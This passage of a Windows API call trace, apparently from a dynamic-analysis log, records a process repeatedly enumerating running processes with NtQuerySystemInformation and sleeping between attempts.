ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.248] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.252] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.269] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.285] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.302] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.316] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.348] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.363] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.378] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.394] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.410] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.425] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.456] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.472] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.522] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.566] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.581] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.597] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.615] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 